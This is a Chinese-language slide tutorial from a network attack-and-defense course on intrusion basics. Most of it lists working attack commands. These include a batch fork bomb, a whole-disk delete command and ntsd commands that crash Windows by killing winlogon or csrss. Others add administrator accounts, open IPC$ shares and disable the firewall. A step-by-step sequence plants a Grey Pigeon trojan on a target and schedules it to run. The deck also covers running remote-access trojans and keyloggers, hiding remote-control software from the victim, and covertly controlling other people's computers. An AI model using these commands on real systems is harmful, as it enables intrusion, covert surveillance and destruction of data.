《网络安全攻防技术教程.ppt》由会员分享,可在线阅读,更多相关《网络安全攻防技术教程.ppt(18页珍藏版)》请在三一办公上搜索。
1、网络入侵基础知识、入侵实战,第2章,李冰川 QQ:594520163Email:,Page 2,章节目标,常用的DOS命令 常用的入侵命令 Hack实战一:命令行下的入侵 Hack实战二:图形界面的入侵 流行远程控制木马的使用方法 键盘记录程序的使用方法,Page 3,常用DOS命令1,Cd 切换目录Dir 列出所有文件信息Del 删除文件Md 创建目录 Rd删除目录Copy 复制Xcopy 复制文件和文件夹Cls 清屏Attrib 修改文件、文件夹属性Date、Time显示日期、时间,Page 4,常用DOS命令2,Path 系统路径Set 显示、设置系统信息Ren(Rename)重命名Su
2、bst 虚拟磁盘Ver 显示操作系统版本Help 帮助/?显示某条命令的帮助,Page 5,非主流DOS命令1,1.重复执行某条命令直至死机的批处理代码:start cmd%02.复制一个文件的磁盘的每个子文件夹当中:for/r/d%a in(*)do copy test.txt%a/y3.不停地执行同一条命令:for/l%a in(1,0,2)do net send 192.168.1.1 炸弹来了!4.死机,蓝屏ntsd-c q-pn winlogon.exentsd-c q-pn csrss.exe,Page 6,非主流DOS命令2,5.删除磁盘所有文件:del*/a/s/q/f6.创建
3、名字为空的文件夹:md(按住Alt键,在小键盘上按2,5,5,然后松开Alt,回车)7.创建无法删除的特殊名字文件夹:md.c:conmd.c:aux8.创建无法双击打开无法删除的另类文件夹:md test.rd test./s/d,Page 7,常用入侵命令1,net user 用户名 密码/add(建立用户)net localgroup administrators 用户名 密码/add(将用户加到管理员,使其拥有管理权限)net user guest/active:Yes(激活guest用户)net user guest 12345(修改guest密码为12345)net user(查看
4、账号属性)net use ipipc$“”/user(建立空IPC连接)net use ipipc$“密码”/user:“用户名”(建立IPC非空连接,非空链接就是需要帐户和密码)net use ipipc$/del(删除IPC空连接)net use z:127.0.0.1c$(映射目标主机磁盘c盘到本地磁盘Z盘),Page 8,常用入侵命令2,net start(查看开启了哪些服务)net start 服务名(开启服务)net time 目标IP(查看对方时间)net view(查看局域网中开启了哪些共享)net share(查看本地开启的哪些共享)net share C$/del(删除C盘
5、默认共享)netstat-an(查看计算机开放了哪些端口)Copy xx.exeipadmin$System32(将当前xx.exe复制到对方Admin$共享的System32目录内),Page 9,常用入侵命令3,sc config tlnesvr start=auto(修改telnet服务的启动方式为自动,auto前面有一个空格)net stop sharedaccess(关闭系统自带的防火墙)net send IP 消息(利用messenger服务向目标IP发送消息)ntsd-c q-pn winlogon.exe(蓝屏重启)ntsd-c q-pn csrss.exe(死机)taskli
6、st(查看进程)taskkill(结束进程),Page 10,实战:纯DOS命令入侵,net use 192.168.2.20ipc$“123”/user:”administrator”net time 192.168.2.20Copy c:server.exe 192.168.2.20admin$svchost.exeAt 192.168.2.20 12:00 start c:windowssvchost.exe这样,对方就中了灰鸽子服务端了。,Page 11,几个小例子,开启禁用的telnet服务:sc config tlntsvr start=auto(auto前有空格)开启3389远程
7、终端reg add 开启C盘默认共享net share c$=c:开启计划任务服务(at命令需要这一服务)net start schedule开启远程注册表(Remote Registry)服务net start remoteregistry,Page 12,图形界面入侵,一、计算机管理 操作菜单连接到另一台计算机二、注册表编辑器 文件菜单连接网络注册表三、第三方工具比如Dameware、Pcanywhere,Dameware的使用方法,Page 13,Dameware的隐藏,用Dameware控制对方,要做到悄无声息,需要注意以下几点:点帮助菜单激活软件,输入注册码注册软件;在远程连接对话框
8、上单击“设置”,勾选:“查看模式”和“显示远程鼠标指针”;切换到“安装选项”选项卡,勾选上“复制配置文件”然后点“编辑”:把“附加设置”选项卡上“允许托盘图标”勾掉再把“通知对话”选项卡上“连接时通知”勾掉。,Page 14,XP默认不能远程控制的原因,在运行中输入命令secpol.msc打开安全策略展开“本地策略”“安全选项”(红色表示默认选项)“安全选项:本地账户的共享和安全模式”经典,表示在远程可以拥有管理员权限仅来宾,表示在远程只能拥有guest权限“账户:使用空白密码的账户只允许进行控制台登录”启用,账户密码为空则不允许远程访问禁用,账户密码为空也允许远程访问所以,要想控制系统为XP
9、的计算机,必须考虑对方安全策略的设置安全策略的设置不影响利用木马进行控制,Page 15,灰鸽子,以华夏灰鸽子2009为例,注意事项:IP地址栏一定要填写自己的IP地址,而且不要忘了加上冒号和端口号,Page 16,PcShare,使用方法和灰鸽子类似,Page 17,键盘记录,以“keyghost”和“简单键盘记录程序”为例,Page 18,实验任务,练习前面PPT中的DOS命令开一台2003虚拟机,利用命令入侵,以能够telnet到对方电脑为入侵成功的标志开一台2003虚拟机,利用图形界面入侵,以能够控制对方桌面为入侵成功的标志使用远控软件Dameware控制别人电脑(要求:悄无声息,不能被对方发现)利用灰鸽子控制别人电脑,
